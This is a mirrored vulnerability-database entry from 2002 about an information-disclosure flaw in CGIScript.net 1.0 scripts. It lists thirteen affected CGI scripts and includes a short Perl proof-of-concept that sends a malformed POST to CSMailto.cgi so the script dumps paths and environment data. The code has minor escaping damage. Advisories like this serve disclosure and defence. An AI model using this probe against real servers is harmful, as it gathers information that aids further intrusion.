CGIScript.net 1.0 – Information Disclosure

CGIScript.net 1.0 – Information Disclosure

漏洞ID 1053587 漏洞类型
发布时间 2002-05-17 更新时间 2002-05-17
图片[1]-CGIScript.net 1.0 – Information Disclosure-安全小百科CVE编号 N/A
图片[2]-CGIScript.net 1.0 – Information Disclosure-安全小百科CNNVD-ID N/A
漏洞平台 CGI CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/21460
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/4764/info

CGIScript.net provides various webmaster related tools and is maintained by Mike Barone and Andy Angrick.

It is possible to cause numerous scripts provided by CGIScript.net to disclose sensitive system information.

The following is a list of cgi scripts that are susceptible to this issue:

csBanner.cgi
csCreatePro.cgi
CSDownload.cgi
csFAQ.cgi
CSFiler.cgi
CSFileshare.cgi
CSGrid.cgi
CSIncludes.cgi
CSMailto.cgi
CSNews.cgi
CSNews.cgi (pro version)
CSRandomText.cgi
CSUpload.cgi

Path, form input, and environment variable information is disclosed when a malformed POST request is submitted. This information may aid the attacker in making further attacks against the host. 

#!/usr/bin/perl
# show_debug_data.pl
# make cgiscript.net scripts dump debug data

use strict;
use IO::Socket::Inet;

my $host = 'hostname.com';
my $path = '/cgi-script/CSMailto/CSMailto.cgi';

my $sock = IO::Socket::INET->new("$host:80");
print $sock "POST $pathn";
print $sock "Content-type: multipart/form-data;";
print $sock " boundary=--nn";
print <$sock>;
close($sock);

相关推荐: Solaris ffbconfig Vulnerability

Solaris ffbconfig Vulnerability 漏洞ID 1105068 漏洞类型 Boundary Condition Error 发布时间 1997-02-10 更新时间 1997-02-10 CVE编号 N/A CNNVD-ID N/A …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享